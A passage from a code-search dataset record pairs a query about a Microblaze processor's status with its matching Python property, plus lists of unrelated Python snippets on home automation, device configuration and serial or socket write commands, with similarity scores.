LoxoneDimmer(**dimmer)\n hass.bus.async_listen(EVENT, new_dimmer.event_handler)\n devices.append(new_dimmer)\n\n for switch in all_switches:\n switch.update({'room': get_room_name_from_room_uuid(loxconfig, light_controller.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, light_controller.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n new_switch = LoxoneLight(**switch)\n hass.bus.async_listen(EVENT, new_switch.event_handler)\n devices.append(new_switch)\n\n for color_picker in all_color_picker:\n color_picker.update({'room': get_room_name_from_room_uuid(loxconfig, light_controller.get('room', '')),\n 'cat': get_cat_name_from_cat_uuid(loxconfig, light_controller.get('cat', '')),\n 'async_add_devices': async_add_devices\n })\n new_color_picker = LoxoneColorPickerV2(**color_picker)\n hass.bus.async_listen(EVENT, new_color_picker.event_handler)\n devices.append(new_color_picker)\n\n async_add_devices(devices, True)\n return True", "def do_load_environment(self, *arg):\n print(\"Loading sensors\")\n self.environment = ArduinoSerialMonitor(auto_detect=False)\n self.do_enable_sensor('environment', delay=1)", "def update(self):\n try:\n if not self._sysinfo:\n self._sysinfo = self.smartplug.sys_info\n self._mac = self.smartplug.mac\n self._model = self.smartplug.model\n if self.smartplug.context is None:\n self._alias = self.smartplug.alias\n self._device_id = self._mac\n else:\n self._alias = self._plug_from_context[\"alias\"]\n self._device_id = self.smartplug.context\n\n if self.smartplug.context is None:\n self._state = self.smartplug.state == self.smartplug.SWITCH_STATE_ON\n else:\n self._state = self._plug_from_context[\"state\"] == 1\n\n if self.smartplug.has_emeter:\n emeter_readings = self.smartplug.get_emeter_realtime()\n\n self._emeter_params[ATTR_CURRENT_POWER_W] = \"{:.2f}\".format(\n emeter_readings[\"power\"]\n )\n self._emeter_params[ATTR_TOTAL_ENERGY_KWH] = \"{:.3f}\".format(\n emeter_readings[\"total\"]\n )\n self._emeter_params[ATTR_VOLTAGE] = \"{:.1f}\".format(\n emeter_readings[\"voltage\"]\n )\n self._emeter_params[ATTR_CURRENT_A] = \"{:.2f}\".format(\n emeter_readings[\"current\"]\n )\n\n emeter_statics = self.smartplug.get_emeter_daily()\n try:\n self._emeter_params[ATTR_TODAY_ENERGY_KWH] = \"{:.3f}\".format(\n emeter_statics[int(time.strftime(\"%e\"))]\n )\n except KeyError:\n # Device returned no daily history\n pass\n\n self._available = True\n\n except (SmartDeviceException, OSError) as ex:\n if self._available:\n _LOGGER.warning(\n \"Could not read state for %s: %s\", self.smartplug.host, ex\n )\n self._available = False", "def _load_config_file(self, config):\n #Now load the config file\n self.config = load_config(config, logger=None)\n\n #Instantiate links to power input (AI) and control output (AO) if the clients\n #were not passed in directly. THis allows us to still run this off of main\n #instead of a launcher if required.\n if self._ai_client == None:\n self._ai_client = nidaqmx_card_server.Client(\n host=self.config[\"power_input_host\"],\n port=self.config[\"power_input_port\"]\n )\n if self._ao_client == None:\n self._ao_client = nidaqmx_card_server.Client(\n host=self.config[\"ctrl_output_host\"],\n port=self.config[\"ctrl_output_port\"]\n )\n\n\n self._ai_channel = self.config[\"power_input_channel\"]\n self._hwc_ai_channel = self.config['hardware_ctrl_input_channel']\n self._ao_channel = self.config[\"ctrl_output_channel\"]\n\n # Configure default parameters\n self.min_voltage = self.config['min_output_voltage'] #Minimum output voltage\n self.max_voltage = self.config['max_output_voltage'] #Maximum output voltage\n self.gain = self.config['gain'] #\"Gain\" between measured voltage and corresponding power\n # NOTE: Internally we store all measured powers as the raw voltages\n # we then only multiply by the gain factor when displaying\n # it to the user.\n self.max_input_voltage = self.config['max_input_voltage'] #Maximum possible input voltage, used for scaling\n #the DAQ acquisition range.\n\n self._hwc_thresh = self.config['hardware_ctrl_thresh']; #Threshold to turn hardware control on/off\n\n #Loading PID parameters\n self.paramP = self.config[\"pid\"][\"p\"]\n self.paramI = self.config[\"pid\"][\"i\"]\n self.paramD = self.config[\"pid\"][\"d\"]\n self.paramMemory = self.config[\"memory\"] #\n self._update_voltageSetpoint_fromGUI()\n self._update_PID()\n\n self.numReadsPerCycle = self.config[\"reads_per_cycle\"] #Number of the reads on the DAQ card that are averaged over for an update cycle.", "def configure_matrixlight(self, config):\n raise NotImplementedError", "def update_lights(self, light_data):\n self.current_brightness = self.brightness\n self.brightness = light_data.get('brightness')\n self.power_state = light_data.get('power_state')\n self._update_board()", "def _load_state(self, config_path=\"\"):\n if not config_path:\n config_path = LAST_SESSION\n try:\n with open(config_path, 'rb') as f:\n data = pickle.load(f)\n self.ui.lineEdit_output_path.setText(data['output_dir'])\n\n #self.ui.lineEdit_device.setText(data['device'])\n dev = data['device']\n index = self.ui.comboBox_device.findText(dev)\n if index != -1:\n self.ui.comboBox_device.setCurrentIndex(index)\n self._get_device_model()\n\n self.ui.lineEdit_data_bits.setText(data['event_bits'])\n self.ui.lineEdit_pulse_freq.setText(data['freq'])\n self.ui.checkBox_timestamp.setChecked(data['timestamp'])\n self.ui.checkBox_comm.setChecked(data['comm_interface'])\n self.ui.checkBox_analog_channels.setChecked(data['analog_on'])\n self.ui.lineEdit_analog_channels.setText(str(data['analog_channels']))\n self.ui.comboBox_analog_freq.setCurrentIndex(data['analog_sample_rate'])\n self.ui.comboBox_dtype.setCurrentIndex(data['analog_dtype'])\n\n self.digital_labels = data['labels']\n self.analog_labels = data.get(\"analog_labels\", self.analog_labels)\n\n # counter input\n index = self.ui.comboBox_ci.findText(data.get(\"counter_input_terminal\", \"ctr0\"))\n if index != -1:\n self.ui.comboBox_ci.setCurrentIndex(index)\n self.ui.checkBox_ci.setChecked(data.get(\"counter_input_on\", False))\n self.ui.comboBox_ci.setEnabled(self.ui.checkBox_ci.isChecked())\n\n # go ahead and polulate the table with the digital labels\n self.ui.tabWidget.setCurrentIndex(0)\n self._setup_table_digital()\n \n self.write_text(\"Loaded config @ {} successfully.\".format(config_path))\n except Exception as e:\n print(e)\n self.write_text(\"Couldn't load previous session. Using defaults.\")", "def switch_update(event):\n if (\n not isinstance(event.device, rfxtrxmod.LightingDevice)\n or event.device.known_to_be_dimmable\n or event.device.known_to_be_rollershutter\n ):\n return\n\n new_device = get_new_device(event, config, RfxtrxSwitch)\n if new_device:\n new_device.apply_event(event)\n add_entities_callback([new_device])", "def load_module(name):\n return __import__(\"metaswitch.%s\" % name,\n fromlist=[\"ROUTES\"])", "def light_action():\n if light_btn.isChecked():\n self.variables.default_values_dict[\"settings\"][\"external_lights\"] = True\n else:\n self.variables.default_values_dict[\"settings\"][\n \"external_lights\"\n ] = False", "def _update_board(self):\n if self.power_state == \"ON\":\n # Only update brightness if on. Will adjust from most recent brightness level.\n self._update_brightness()\n else:\n # Case where called to switch off\n self._update_color(OFF)\n logger.info(self.power_state)\n logger.info(self.brightness)", "async def reload_platform(self) -> None:", "def load_config(self):\n with open(self.TEMPERATURE_CONFIG_FILE_PATH, 'r') as file:\n self.config = json.load(file)", "def initialConfig(self):\r\r\n\r\r\n loggerCmw = logging.getLogger('initialConfig')\r\r\n\r\r\n self.set_scenario()\r\r\n\r\r\n self.set_default_rf_settings()\r\r\n\r\r\n self.physical_downlink_settings()\r\r\n\r\r\n self.physical_uplink_settings()\r\r\n\r\r\n self.connection_config()\r\r\n\r\r\n self.network_settings()\r\r\n\r\r\n self.set_conn_type(conn= self.connTypeEnum.CS)\r\r\n\r\r\n self.waitForCompletion()" ]
[ "0.62282544", "0.5851503", "0.5757967", "0.5553404", "0.5420665", "0.5405235", "0.5385367", "0.53103375", "0.5305637", "0.52973616", "0.5270049", "0.52667636", "0.5264424", "0.52271485", "0.5182084", "0.51805335", "0.51612717", "0.515244", "0.5107933", "0.50897145", "0.50789636", "0.5074718", "0.5069044", "0.50566053", "0.50538623", "0.504823", "0.5027205", "0.4997396", "0.49921843", "0.49845707", "0.4978585", "0.4971486", "0.49591947", "0.49492413", "0.4944295", "0.49419063", "0.49410403", "0.4931611", "0.4925331", "0.49179688", "0.49130747", "0.4909243", "0.4905791", "0.48958603", "0.48848465", "0.4880328", "0.4871189", "0.4867395", "0.4865479", "0.4863431", "0.4860975", "0.4856747", "0.48258957", "0.48222274", "0.48133218", "0.48081884", "0.48074207", "0.4805745", "0.47989467", "0.47944674", "0.47920433", "0.4790161", "0.4787899", "0.4786276", "0.47746179", "0.47736594", "0.47706538", "0.4766932", "0.4749725", "0.47308502", "0.4728061", "0.47268727", "0.47265562", "0.471514", "0.4715032", "0.47057644", "0.47009686", "0.47000623", "0.46990106", "0.46913773", "0.4690124", "0.46860778", "0.46857008", "0.46816406", "0.46771565", "0.46662772", "0.4666076", "0.46634054", "0.46474767", "0.46454802", "0.46385962", "0.46368077", "0.46315688", "0.46262726", "0.46220857", "0.46213895", "0.4621167", "0.46205", "0.46108612", "0.46051964" ]
0.67974967
0
Returns the status of the Microblaze processor. Returns str The processor status ("IDLE", "RUNNING", or "STOPPED").
def status(self): return self.microblaze.state
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_status(self):\n return self.read_register(259, 0, 3)", "async def get_status(self) -> str:\n return await self.hw_device.status()", "def get_status(self):\n if self.vm.get_cloud_status() != \"ACTIVE\":\n return \"stopped\"\n #wait for the vm to be ready and SSH-able\n self.vm.wait_ready()\n status = self.vm.run_command(\"ctool status\", indent=0, prefix='')\n return status.strip()", "def processor():\n return uname().processor", "def processor():\n return uname().processor", "def hardware_status(self):\n stat = structs.JLinkHardwareStatus()\n res = self._dll.JLINKARM_GetHWStatus(ctypes.byref(stat))\n if res == 1:\n raise errors.JLinkException('Error in reading hardware status.')\n return stat", "def runtime_status(self):\n try:\n return self.yarn_api.state(self.app_id)\n except:\n return \"NONE\"", "def status(self):\n return self._bp.get_motor_status(self._port)", "def get_status(self):\n\n return self._system", "def get_cpu_core():\n processor_info = subprocess.getoutput('dmidecode -t processor')\n cpu_core_value = re.findall(r'(?i)Core Count:\\s+(.*?)\\n', processor_info, re.S)[0]\n log.info('cpu_core value:{}'.format(cpu_core_value))\n if cpu_core_value:\n cpu_core = cpu_core_value\n else:\n cpu_core = ''\n return cpu_core", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self) -> str:\n return pulumi.get(self, \"status\")", "def status(self):\n status_filename = os.path.join(self.path, 'brightness')\n with open(status_filename) as status_fp:\n result = status_fp.read()\n status_text = result.strip()\n try:\n status = int(status_text)\n except ValueError:\n return status_text\n return status", "def get_cpuinfo() -> str:\n\n # Read /proc/cpuinfo\n try:\n with open('/proc/cpuinfo', 'r') as f:\n return f.read()\n except IOError:\n print('Error: Could not read /proc/cpuinfo', file = sys.stderr)\n return ''", "def get_cpu_mode(self):\n\t\treturn call_sdk_function('PrlSrvCfg_GetCpuMode', self.handle)", "def get_cpu_info():\n try:\n cpu_info = subprocess.check_output('lscpu')\n return cpu_info\n except OSError:\n return None", "def cpuinfo(self):\n \n command = 'cat /proc/cpuinfo'\n\tpipe = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n stdout, stderr = pipe.communicate()\n\tinfo = stdout.strip()\n cpu_type = None\n\tn_proc = 0\n\tfor line in info.split('\\n'):\n if 'model name' in line:\n\t n_proc += 1\n if cpu_type is None:\n\t\t cpu_type = ' '.join(line.split(':')[-1].strip().split())\n\t\n\treturn (cpu_type, n_proc)", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"status\")", "def status(self):\n\n # --- get 0 padded string representation of status register\n response = self.send_lens_cmd(['90', 'B9', '00'], fast_mode=True)\n state_str = bin(int('0x' + response['MISO'][2], 16))\n state_str = state_str[2:]\n for p in range(8 - len(state_str)):\n state_str = '0' + state_str\n\n self._status = dict(AF_switch=bool(int(state_str[0])),\n F_move=bool(int(state_str[5])),\n F_acc=bool(int(state_str[2])),\n FD_endStop=bool(int(state_str[3])),\n status_byte=state_str)\n\n return self._status", "def status(self) -> pulumi.Output['outputs.JobStatus']:\n return pulumi.get(self, \"status\")", "def cpu(self) -> Optional[Any]:\n return pulumi.get(self, \"cpu\")", "def cpu(self) -> Optional[Any]:\n return pulumi.get(self, \"cpu\")", "def checkCpu(self):\n cpu = self.getCpu()\n err_msg = []\n task_result = device_status = 0\n\n if cpu is None:\n err_msg.append('Get CPU info failed')\n task_result = device_status = 1\n else:\n # 以后可扩展告警条件\n pass\n return cpu, err_msg, task_result, device_status", "def get_status(self):\n return self.o.read_register(self.dev_id, STATUS)", "def status(self):\n ret = self.dev.ctrl_transfer(0xc0, 0x01, 0x0081, 0x0000, 0x0001)\n if ret[0] == 0xa0:\n return self.POWER_ON\n return self.POWER_OFF", "def _do_get_status(self):\n logging.info(__name__ + ' : Get status of the device.')\n result = self._execute('X')\n usage = {\n 0: \"Channel not in use\",\n 1: \"Channel used for Nitrogen level\",\n 2: \"Channel used for Helium Level (Normal pulsed operation)\",\n 3: \"Channel used for Helium Level (Continuous measurement)\",\n 9: \"Error on channel (Usually means probe unplugged)\"\n }\n # current_flowing = {\n # 0 : \"Curent not flowing in Helium Probe Wire\",\n # 1 : \"Curent not flowing in Helium Probe Wire\"\n # }\n # auto_fill_status = {\n # 00 : \"End Fill (Level > FULL)\",\n # 01 : \"Not Filling (Level < FULL, Level > FILL)\",\n # 10 : \"Filling (Level < FULL, Level > FILL)\",\n # 11 : \"Start Filling (Level < FILL)\"\n # }\n return usage.get(int(result[1]), \"Unknown\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Output[Optional[str]]:\n return pulumi.get(self, \"status\")", "def get_full_juju_status():\n\n status = model.get_status(lifecycle_utils.get_juju_model())\n return status", "def get_status(self):\n\t\treturn call_sdk_function('PrlJob_GetStatus', self.handle)", "def _get_cpu_virtualization(self):\n try:\n cpu_vt = self._get_bios_setting('ProcVirtualization')\n except exception.IloCommandNotSupportedError:\n return False\n if cpu_vt == 'Enabled':\n vt_status = True\n else:\n vt_status = False\n return vt_status", "def get_cpu_mode(self):\n\t\treturn call_sdk_function('PrlVmCfg_GetCpuMode', self.handle)", "def pr_status(self) -> pulumi.Output[str]:\n return pulumi.get(self, \"pr_status\")", "def GetStatus(self):\r\n return self.status", "def status(self):\n st = ct.c_int()\n self.lib.GetStatus(ct.pointer(st))\n if st.value == 20073:\n return 'Camera is idle, waiting for instructions.'\n elif st.value == 20074:\n return 'Camera is executing the temperature cycle.'\n elif st.value == 20072:\n return 'Acquisition in progress.'\n elif st.value == 20023:\n return 'Unable to meet accumulate cycle time.'\n elif st.value == 20022:\n return 'Unable to meet kinetic cycle time.'\n elif st.value == 20013:\n return 'Unable to communicate with card.'\n elif st.value == 20018:\n return ('Computer unable to read the data via the ISA slot at the '\n 'required rate.')\n elif st.value == 20026:\n return 'Overflow of the spool buffer.'", "def getStatus(self):\n return self.__status", "def get_provisioning_state(self):\n url = \"/api/v1/machine/{}\".format(self.machine_id)\n return self.urlhandler.get(url)", "def VMStatus(self):\n try:\n status = self.vmInstance.get_status()\n LOGGER.info('Current status of virtual machine \"{}\": {}'.format(VM_NAME, status))\n\n except Exception as e:\n status = None\n LOGGER.debug(e)\n LOGGER.error(traceback.format_exc())\n LOGGER.error('An error occured while getting status of virtual machine \"{}\"!'.format(VM_NAME))\n\n return status", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> Optional[str]:\n return pulumi.get(self, \"status\")", "def get_ready_status():\n statusObj = get_server_status(fields=['ready'])\n return statusObj['ready']", "def getStatus(self):\r\n return self.controller.getStatus()", "def status(self):\n if self.qemu.is_running():\n status = 0\n self.log.info(\"vm-status\", result=\"online\")\n for device in list(self.qemu.block_info().values()):\n self.log.info(\n \"disk-throttle\",\n device=device[\"device\"],\n iops=device[\"inserted\"][\"iops\"],\n )\n else:\n status = 1\n self.log.info(\"vm-status\", result=\"offline\")\n for volume in self.ceph.volumes:\n locker = volume.lock_status()\n self.log.info(\"rbd-status\", volume=volume.fullname, locker=locker)\n consul = locate_live_service(self.consul, \"qemu-\" + self.name)\n if consul:\n self.log.info(\n \"consul\", service=consul[\"Service\"], address=consul[\"Address\"]\n )\n else:\n self.log.info(\"consul\", service=\"<not registered>\")\n return status", "def __call__(self):\n status = self.os.popen('circusctl status monitor').read().strip()\n\n if status == 'active':\n return True\n elif status == 'stopped':\n return False", "def core_cpu(self):\n return self._dll.JLINKARM_CORE_GetFound()", "def status(self):\n \n tmpl1 = \"\"\"%-20s%-52s[%s]\"\"\"\n tmpl2 = \"\"\"%-20s%-52s\\n\"\"\"\n # print tmpl1 % (\"Machine Name\", \"IP Addresses\", \"Status\")\n # print 80 * \"-\"\n # print self.get_image()\n if self.cloudserver:\n # let's build the IPs first\n status = self.cloudserver.status\n \n else:\n status = \"OFF\"\n\n res2=\"\"\n ip1 = \"%s:%s\" % (self.networks[0], self.ip_addresses[self.networks[0]])\n if len(self.networks) > 1:\n res2 += \"\\n\"\n for network in self.networks[1:]:\n ipstr = \"%s:%s\" % (network, self.ip_addresses[network])\n res2+=tmpl2 % (\"-\", ipstr)\n # print res2\n # if len(self.ip_addresses.keys()) > 1:\n # ip1 = self.ip_addresses.values()[0]\n res1 = tmpl1 % (self.machine_name, ip1, status)\n return res1 + res2", "def status(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"status\")", "def status(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"status\")", "def getstatus(self):\n return self.__status", "def status(self):\n return self.get(self._names[\"status\"])", "def get_running_status(self):\n obj = ProcessInfo('jobs')\n process_list = obj.handle_parameter()\n if process_list:\n # get the hostname\n hostname = process_list[0]\n del process_list[0]\n process_list = obj.extract_process(process_list)\n # print 'dict is here$$$$$'\n dict_processor = []\n for proc_val in process_list:\n if proc_val.search_result ==0:\n dict_processor.append({'processor':proc_val.name,'status':'Stopped','PID':str(proc_val.pid)})\n elif proc_val.search_result >=1:\n dict_processor.append({'processor':proc_val.name,'status':'Running','PID':str(proc_val.pid)})\n # dict_processor[proc_val.name] = 'Running'\n # print (\"|%-20s|%-5s|\"%(proc_val.name,proc_val.search_result))\n # print dict_processor\n return dict_processor\n else:\n return False" ]
[ "0.66442674", "0.65349734", "0.6357901", "0.61985266", "0.61985266", "0.6195143", "0.61590946", "0.6113441", "0.6109538", "0.6081476", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.6031187", "0.60137796", "0.5999629", "0.5986909", "0.5985036", "0.59819746", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59770167", "0.59683776", "0.59665585", "0.59520686", "0.59520686", "0.5946681", "0.5945029", "0.5921645", "0.59178203", "0.5902624", "0.5902624", "0.5902624", "0.59005505", "0.5886418", "0.5878332", "0.58766556", "0.58712393", "0.58698565", "0.58645195", "0.58583975", "0.58542037", "0.58501583", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5840485", "0.5837051", "0.58321965", "0.5826144", "0.58252406", "0.5821392", "0.5818871", "0.5816521", "0.5816521", "0.5812639", "0.5805608", "0.57828486" ]
0.692374
0
Send a write command to the mailbox.
def write_cmd(self, address, data, d_width=4, d_length=1, timeout=10): # Write the address and data self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_ADDR_OFFSET, address) self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_DATA_OFFSET, data) # Build the write command cmd_word = get_cmd_word(WRITE_CMD, d_width, d_length) self.microblaze.write(MAILBOX_OFFSET + MAILBOX_PY2IOP_CMD_OFFSET, cmd_word) # Wait for ACK in steps of 1ms countdown = timeout while not self.is_cmd_mailbox_idle() and countdown > 0: time.sleep(0.001) countdown -= 1 # If ACK is not received, alert users. if countdown == 0: raise RuntimeError("ArduinoDevMode write_cmd() not acknowledged.")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write(self, cmd):\n self._chan.send(\"{}\\n\".format(cmd))\n logger.debug(\"sent '{}'\".format(cmd))", "def write(self, cmd):\n if self.tn:\n try:\n self.wlock.acquire()\n if not isinstance(cmd, bytes): cmd = cmd.encode('ascii')\n self.tn.write(cmd)\n except OSError:\n self.close()\n finally:\n self.wlock.release()", "def write(self, msg):\n cmd = self.__compose(msg)\n self.sock.send(cmd)", "def write(self, command: str) -> None:\n self._dmm.write(command)", "def send(self, msg):\n raise NotImplementedError(\"Trying to write to a readonly bus?\")", "def send_command(command):\n print(\"Send: >>> \\n\"+command)\n TOFILE.write(command + EOL)\n TOFILE.flush()", "def write(self, message):\r\n os.write(self.wfid, message.encode('utf-8'))", "def write(self):\r\n assert self.status == SEND_ANSWER\r\n sent = self.socket.send(self.message)\r\n if sent == len(self.message):\r\n self.status = WAIT_LEN\r\n self.message = ''\r\n self.len = 0\r\n else:\r\n self.message = self.message[sent:]", "def sendCommand(self, command):\n finalCommand = struct.pack(\"B\", len(command)) + command\n if self._writeChar is None:\n self._reconnect = True\n self._writeQueue.put(finalCommand)", "def write(self, cmd: bytes) -> None:\n logger.debug(f\"write='{cmd}'\")\n self._con.write(cmd)\n self._con.flush()", "def send(self, msg):\n self._mailbox.put(msg)", "def __write(self, cmd):\n\n if self.__port:\n cmd += b\"\\r\\n\" # terminate\n print(\"write: \" + repr(cmd))\n self.__port.flushInput() # dump everything in the input buffer\n self.__port.write(cmd) # turn the string into bytes and write\n self.__port.flush() # wait for the output buffer to finish transmitting\n else:\n print(\"cannot perform __write() when unconnected\")", "def writeMessage(self,message):\n pass", "def handle_write(self):\n self.initiate_send()", "def write(self, data):\n with self._write_lock:\n self.socket.send(data)", "def send(self, ard: Arduino_functions.Arduino, write_msg_str):\n self.worker_send.queue.put((ard, write_msg_str))\n\n # Trigger processing the worker_send queue.\n self.worker_send.qwc.wakeAll()", "def write(self, msg):\n self.sock.send(msg.encode())", "def send_cmd(self, cmd):\n logger.info(\"sending cmd %s to fuse\", cmd)\n with open(self.ipc + \".\" + str(threading.current_thread().ident), 'w', 0) as f:\n #with open(self.ipc, 'a+') as f:\n f.write(cmd)\n #f.flush()\n logger.info(\"writing to fuse returned\")", "def write(self, msg, *_):\n if self.out is not None:\n self.out.write(msg)\n self.out.flush()", "def handle_write(self):\n #send_types = \" + \".join(\n # messages.get_message_type(message) for message in self.buffer)\n for message in self.buffer:\n if isinstance(message, str):\n self.send(message)\n else:\n self.send(message.pack())\n self.buffer = []\n #print \"To %s:%s sent: \" % (self.address, self.port), send_types", "async def _write_async(self, command: bytes):\n await self._serial.write_async(command)\n logger.debug(f\"Command {repr(command)} sent!\")", "def write(self):\n assert self.status == SEND_ANSWER\n sent = self.socket.send(self.message)\n if sent == len(self.message):\n self._set_status(WAIT_LEN)\n self.message = b''\n self.len = 0\n else:\n self.message = self.message[sent:]", "def send_command(command):\n print(\"Send: >>> \"+command)\n TOPIPE.write(command + EOL)\n TOPIPE.flush()", "async def send_msg(self, msg):\n try:\n logging.info(\"Sending: %s\", msg)\n self.writer.write(msg.encode())\n await self.writer.drain()\n\n except Exception as e:\n logging.error(\"Command could not be encoded; %s\", e)", "def _write_message(self, message):\n raw_data = message.serialize()\n debug(\"writing outgoing message of type \" + message.__class__.__name__)\n self.request.sendall(raw_data)", "def write(self, message):\n\n if self.multi_command is not None:\n log.debug(\n 'Writing to multi-command buffer for device \"{0}\": {1!r}'.format(self.name, message))\n\n self.multi_command.append(message)\n return\n\n log.debug('Writing to device \"{0}\": {1!r}'.format(self.name, message))\n\n if self.driver == drivers.pyvisa:\n try:\n self.device.write(message)\n except pyvisa.VisaIOError as e:\n if e.error_code == pyvisa.errors.VI_ERROR_TMO:\n print(\"In pyvisa timeout error\")\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.telnet:\n try:\n self.device.write(message)\n except Exception:\n if e is socket.timeout:\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.requests:\n r = requests.get(self.request_address + message)\n if r.status_code != 200:\n raise Exception(\"Write did not work\")\n\n elif self.driver == drivers.lgpib:\n try:\n self.device.write(message)\n except gpib.GpibError as e:\n if 'timeout' in e.message:\n raise DeviceTimeout(e)\n else:\n raise\n\n elif self.driver == drivers.pyvisa_usb:\n # Send the message raw.\n if not (legacyVisa):\n self.device.write_raw(message)\n else:\n pyvisa.vpp43.write(self.device.vi, message)\n\n else:\n print(\"Passed without writing\")", "def write(self, command):\r\n try:\r\n cmd = urllib.parse.quote(command) # escape special chars\r\n req_url = self.url + 'write/' + cmd\r\n requests.get(url=req_url)\r\n except ValueError:\r\n print(\"uart failed write\")", "def _send_command(self, command):\n self._serial_port.write(command + '\\n')\n self._serial_port.flush()", "def write(self, data):\n self._write_lock.acquire()\n try:\n self.socket.sendall(data)\n finally:\n self._write_lock.release()", "async def _send_command(self, command):\n send_message = \"\"\n\n for i in command:\n send_message += chr(i)\n result = None\n for data in send_message:\n try:\n result = await self.write(data)\n except():\n if self.log_output:\n logging.exception('cannot send command')\n else:\n print('cannot send command')\n return result", "def write_message(self, message):\r\n logging.debug(\"Sending message {mes} to {usr}\".format(mes=message, usr=self.id))\r\n self.handler.write_message(message)", "def send_command(self, command):\n send_message = \"\"\n for i in command:\n send_message += chr(i)\n #send_message += bytes(i)\n\n for data in send_message:\n self.pymata.transport.write(data)", "def send_message(self, data):\n self.transport.write(data)", "def send(self, message, callback=None):\n assert isinstance(message, domintell.Message)\n self._write_queue.put_nowait((message, callback))", "def send(self, message, callback=None):\n assert isinstance(message, domintell.Message)\n self._write_queue.put_nowait((message, callback))", "def sendCommand(ser, msg):\n ser.write(\"%s\\r\\n\" % (msg))\n return", "def write(self, line):\n self.sendall(six.text_type(line).encode(self.encoding))", "def write(self, command):\n self.meas.write(bytes(command, \"utf8\"))", "def write(self, cmd):\n if isinstance(cmd, (tuple, list)):\n self.device.write(\";\".join(cmd))\n else:\n self.device.write(cmd)", "def send_command(command):\n\tmessage = json.dumps (command)\n\tbottle = local_out_port.prepare()\n\tbottle.clear()\n\tbottle.addString(message)\n\tlocal_out_port.write(False)", "def write(self, out, message):\n if out != None:\n out.write(message)", "def SERIAL_SEND_cmd(self, cmd):\n # Must be connected & operational\n if self.State == 0:\n # a slightly more informative result might help\n return \n\n # SEND\n if 